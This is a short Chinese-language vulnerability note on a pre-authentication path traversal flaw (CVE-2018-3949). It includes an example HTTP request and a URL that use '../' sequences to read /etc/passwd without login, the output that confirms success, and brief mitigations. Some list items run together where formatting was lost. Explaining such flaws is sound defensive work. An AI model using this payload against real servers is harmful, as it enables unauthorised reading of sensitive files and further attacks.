Pre-Auth Path Traversal 漏洞(CVE-2018-3949) 是一个严重的安全问题,允许攻击者在无需认证的前提下,通过构造恶意路径访问系统文件,可能读取敏感信息如 /etc/passwd,从而获取服务器配置信息或进行进一步攻击。
漏洞影响范围:
应用层 → 文件读取绕过
攻击者无需凭证,即可访问服务器上任意文件路径。
该漏洞存在于 Web 应用程序的资源访问路径处理逻辑中,攻击者可构造特殊 URI,对路径进行目录遍历,从而访问服务器上任意位置的文件。
攻击请求示例:
GET /help/../../../../../../../../../../../../../../../../etc/ HTTP/1.1
Host: <目标地址>
Referer: http://<目标地址>/Index.htm
其中:
/help/../../../../.../etc/ 为目录遍历路径,可访问到系统根目录下的 /etc/Referer 伪造为合法页面以绕过简单的 Referer 检查根本原因:
../)的识别与阻断攻击者可直接通过浏览器或脚本访问以下路径:
http://<目标地址>/help/../../../../../../../../../../../../../../../../etc/passwd
若返回内容包含如下字段,表示读取成功:
root:x:0:0:root:/root:/bin/bash
效果: 攻击者无需登录即可读取系统敏感配置文件,为进一步攻击(如提权、服务识别)提供信息。
防护建议:
realpath())并校验合法性📝 作者:ahlien 📧 邮箱:mfs24@mails.tsinghua.edu.cn
🏫 单位:Tsinghua University
📅 最后更新时间:2025-07-30